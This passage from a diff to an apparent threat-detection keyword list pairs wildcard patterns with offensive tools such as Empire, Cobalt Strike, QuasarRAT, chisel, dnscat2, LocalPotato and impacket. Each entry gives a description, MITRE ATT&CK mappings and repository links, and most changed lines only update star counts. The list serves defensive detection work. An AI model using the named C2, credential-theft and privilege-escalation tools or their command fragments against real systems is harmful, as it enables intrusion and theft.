T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Local:Get-ProcAddress*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-local=0.0.0.0:4001*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*localexploit_demo_template.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*localhost/pipe/pwned*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" -"*localhost:1337*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" -"*localhost:1337*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*localhost:1337*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*localhost:1337*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*localhost:3000*striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" -"*localhost:31337*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*localhost:3333*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z" +"*localhost:31337*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*localhost:3333*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" "*localhost:4567*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" -"*localhost:4782*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*localhost:4782*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" "*localhost:53531*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" "*localhost:8022*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" -"*localhost:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*localhost:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*localpotato -i*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" "*LocalPotato.cpp*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" "*LocalPotato.exe*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" @@ -13216,18 +13373,18 @@ "*LocalPotato.vcxproj*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" "*LocalPotato.zip*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" "*LocalPotato-master*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" -"*localreconmodules*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*localreconmodules*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*localrelay_linux_amd64*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*LocateBrc4Config*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*lockless *.dat*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*LockLess.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*Locksmith-main.zip*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","472","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" -"*log4_shell.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*lockless *.dat*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*LockLess.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Locksmith-main.zip*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","473","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" +"*log4_shell.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*log4shell*.nessus.org*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" -"*log4shell.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*log4shell.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*LoGiC.NET.exe*","offensive_tool_keyword","LoGiC.NET","A more advanced free and open .NET obfuscator using dnlib","T1001","TA0011","N/A","N/A","Defense Evasion","https://github.com/AnErrupTion/LoGiC.NET","1","1","N/A","N/A","5","483","75","2023-08-23T09:55:54Z","2019-12-27T09:48:50Z" "*loginsight.thrift*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" -"*LogonTracer*","offensive_tool_keyword","LogonTracer","LogonTracer is a tool to investigate malicious logon by visualizing and analyzing Windows Active Directory event logs. This tool associates a host name (or an IP address) and account name found in logon-related events and displays it as a graph. This way. it is possible to see in which account login attempt occurs and which host is used.","T1057 - T1087 - T1208","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/JPCERTCC/LogonTracer","1","0","N/A","N/A","10","2468","445","2023-09-08T13:32:03Z","2017-11-24T06:07:49Z" +"*LogonTracer*","offensive_tool_keyword","LogonTracer","LogonTracer is a tool to investigate malicious logon by visualizing and analyzing Windows Active Directory event logs. This tool associates a host name (or an IP address) and account name found in logon-related events and displays it as a graph. This way. it is possible to see in which account login attempt occurs and which host is used.","T1057 - T1087 - T1208","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/JPCERTCC/LogonTracer","1","0","N/A","N/A","10","2469","445","2023-09-08T13:32:03Z","2017-11-24T06:07:49Z" "*logs/Responder-Session.log*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*logs/ridenum.log*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*logs/shares-with-SCF.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" @@ -13235,77 +13392,77 @@ "*logToBeaconLog*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*LOLBAS-Project*","offensive_tool_keyword","LOLBAS-Project","Living Off The Land Binaries and Scripts (and also Libraries) malicious use of legitimate tool","T1072 - T1059.003 - T1059.004 - T1059.001 - T1059.005 - T1564.001","TA0002 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://lolbas-project.github.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*LOLBins/NetLoader.xml*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" -"*Londor.exe -t Coverage*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*Londor.exe -t Script*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*Londor.exe -t Coverage*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*Londor.exe -t Script*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*looCiprian/GC2-sheet*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" "*lookupsid.py -hashes :* *@* 0*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*lookupsid.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*loot_memory.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - 